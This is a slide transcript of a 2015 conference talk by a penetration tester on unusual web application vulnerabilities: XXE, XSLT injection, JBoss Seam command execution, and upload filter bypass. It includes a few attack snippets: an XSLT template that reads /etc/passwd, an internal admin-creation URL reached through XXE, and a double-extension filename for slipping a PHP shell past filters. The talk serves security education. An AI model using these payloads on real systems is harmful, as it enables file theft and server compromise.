CONFidence 2015: Nietypowe problemy bezpieczeństwa w aplikacjach webowych - Michał Sajdak
Transcript of CONFidence 2015: Nietypowe problemy bezpieczeństwa w aplikacjach webowych - Michał Sajdak
Unusual security problems in web applications.
Michał Sajdak, CISSP, CEH, F2B
securitum.pl
sekurak.pl
rozwal.to
About me
Michał Sajdak <at> securitum.pl
Pentester
Instructor (security trainings)
sekurak.pl founder
rozwal.to founder
2 Copyright 2014 Securitum
www.securitum.pl
Agenda
Vulnerabilities in Nuxeo First public disclosure
(Maybe?) not so obvious path traversal(s)
OS code exec
XXE
JBoss Seam nice RCE
RCE through XSLT transformation (if we have time)
PHP shell upload – filter bypassing (if we have time)
Educational use only
3 Copyright 2014 Securitum
www.securitum.pl
Nuxeo
Content Management Platform for the Software-Defined Enterprise
4 Copyright 2015 Securitum
www.securitum.pl
Nuxeo
The RPM (Release and Preservation Management) Department at EA uses the Nuxeo Platform to manage video game builds at all stages of the development lifecycle
Using the Nuxeo Platform as a core server, Jeppesen, a Boeing company, syncs flight bag information to iPads for pilots across the world.
5 Copyright 2015 Securitum
www.securitum.pl
Nuxeo
The Nuxeo Platform, offering strong support for SSO, along with a flexible content management platform, is the perfect addition to the US Navy’s application portfolio.
Orange manages communication with its mobile telecommunications and broadband internet provider clients through a secure extranet portal built on the Nuxeo Platform.
6 Copyright 2015 Securitum
www.securitum.pl
Nuxeo
History
Bug patched this year (February)
Reported by Michal Bentkowski & Sebastian Gilon from securitum.pl
https://doc.nuxeo.com/display/ADMINDOC/Nuxeo+Security+Update+-+2015-02-27+-+Critical
No details disclosed
DEMO
7 Copyright 2015 Securitum
www.securitum.pl
Nuxeo – reporting history
Securitum: Hey, you got some nasty bugs in your platform. Here are the details.
Nuxeo: Cool, these are definitely nice bugs! We’ll prepare a patch soon! BTW: do you want something for reporting the bug?
Securitum: no :-)
Nuxeo: Do you drink from time to time?
Securitum: Sometimes :P
Nuxeo: Cool, we are sending 2 crates of vine to Poland 8
Nice bug bounty
9
XXE (XML eXternal Entities)
XXE has been known for a while
But many many applications are vulnerable by default
BTW: XXE tests are available only in the latest versions of burp suite (very popular web pentesting tool)
10 Copyright 2014 Securitum
www.securitum.pl
XXE (XML eXternal Entities)
HTML entiries < lub <
<
" ' & µ … Or:
&entity_name; &#entity_number;
11 Copyright 2014 Securitum
www.securitum.pl
HTML entities
Similar in XML…
12 Copyright 2014 Securitum
www.securitum.pl
XXE (XML eXternal Entities)
… but we can define our own entities
<!ENTITY name "value">
13 Copyright 2014 Securitum
www.securitum.pl
14 Copyright 2014 Securitum
www.securitum.pl
15
XXE (XML eXternal Entities)
We can only read files?
No :p
Making http requests Transfering files to your server (blind XXE)
Making request to 127.0.0.1
Some of these are unauthenticated ?
Scanning backend infrastruture
Services with no auth check, etc.
http://10.0.0.75:8080/usrMgmt/add/admin2/admin2
16 Copyright 2014 Securitum
www.securitum.pl
XXE (XML eXternal Entities)
Actually we can often exploit XXE when no tag is displayed (!)
ie. only when the XML parser starts.
Parameter Entity
They can be used only in DOCTYPE
<!ENTITY % name "entity_value">
17 Copyright 2014 Securitum
www.securitum.pl
sekurak.pl/data/ccc
More info: sekurak.pl/tag/xxe/
18 Copyright 2014 Securitum
www.securitum.pl
XXE (XML eXternal Entities)
Can we only read files?
No :P
Making http requests Transfering files to your server (blind XXE)
FW must allow outgoing http communication
Making request to 127.0.0.1
Some of there are unauthenticated ?
Scanning backend infrastructore
Services with no auth check, etc.
19 Copyright 2014 Securitum
www.securitum.pl
XXE (XML eXternal Entities)
DEMO
20
Copyright 2014 Securitum www.securitum.pl
XSLT
XSLT (Extensible Stylesheet Language Transformations) is a language for:
transforming XML documents into other XML documents or other formats such as HTML for web pages, plain text
© wikipedia
21 Copyright 2014 Securitum
www.securitum.pl
XSLT
Commonly used for custom styling in web apps
XML (db generated) + XSLT (user provided styles)
= nice HTML
= nice PDF
etc.
22 Copyright 2014 Securitum
www.securitum.pl
23 Copyright 2014 Securitum
www.securitum.pl
XSLT
We can have a problem when a user (ie. attacker) can provide XSL file to be parsed at server side
Example: custom destkop in web app
Example: print templates
…
24 Copyright 2014 Securitum
www.securitum.pl
XSLT
Java…
25 Copyright 2014 Securitum
www.securitum.pl
XSLT
PHP
Doesn’t work by default…
But reading files does:
<xsl:template match="/"> <xsl:copy-of select="document('/etc/passwd')"/> </xsl:template>
26 Copyright 2014 Securitum
www.securitum.pl
OS Command Exec – JBoss Seam
But an example of the following problem
We deploy an app which uses library X
After some time… vulnerabilities in the used lib
Info: Meder Kydyraliev, Seam Vulnerability, http://blog.o0o.nu/
27 Copyright 2014 Securitum
www.securitum.pl
OS Command Exec – JBoss Seam
There is (are) a vulnerability in JBoss Seam which allows you to exec OS code
No auth needed
No specific condition needed
The only requirement – an app is using the vulnerable version of the lib
DEMO
28 Copyright 2014 Securitum
www.securitum.pl
Upload / Apache – filter bypassing
Commonly used methods:
File extension blacklisting
ie.: no .php / .jsp / etc. can be uploaded
Checking file structure
ie.: if the uploaded file is a real image / pdf / etc
29 Copyright 2014 Securitum
www.securitum.pl
Upload / Apache – filter bypassing
Interesting fact
How many of apache servers will interpret the following file:
test.jpg.php.wnk2j3.tralalala.sekurak
txt ?
php ?
jpg ?
30 Copyright 2014 Securitum
www.securitum.pl
31 Copyright 2014 Securitum
www.securitum.pl
What’s next?
dotnetnuke – full unauth admin
TP-link devices
Two new methods for gaining OS root
One sort of universal – works in old/new devices
Disclosure on sekurak.pl ~soon
32 Copyright 2014 Securitum
www.securitum.pl
Q&A ?
Questions?
Contact: [email protected]
http://securitum.pl/
http://sekurak.pl/
http://rozwal.to/
33 Copyright 2014 Securitum
www.securitum.pl
34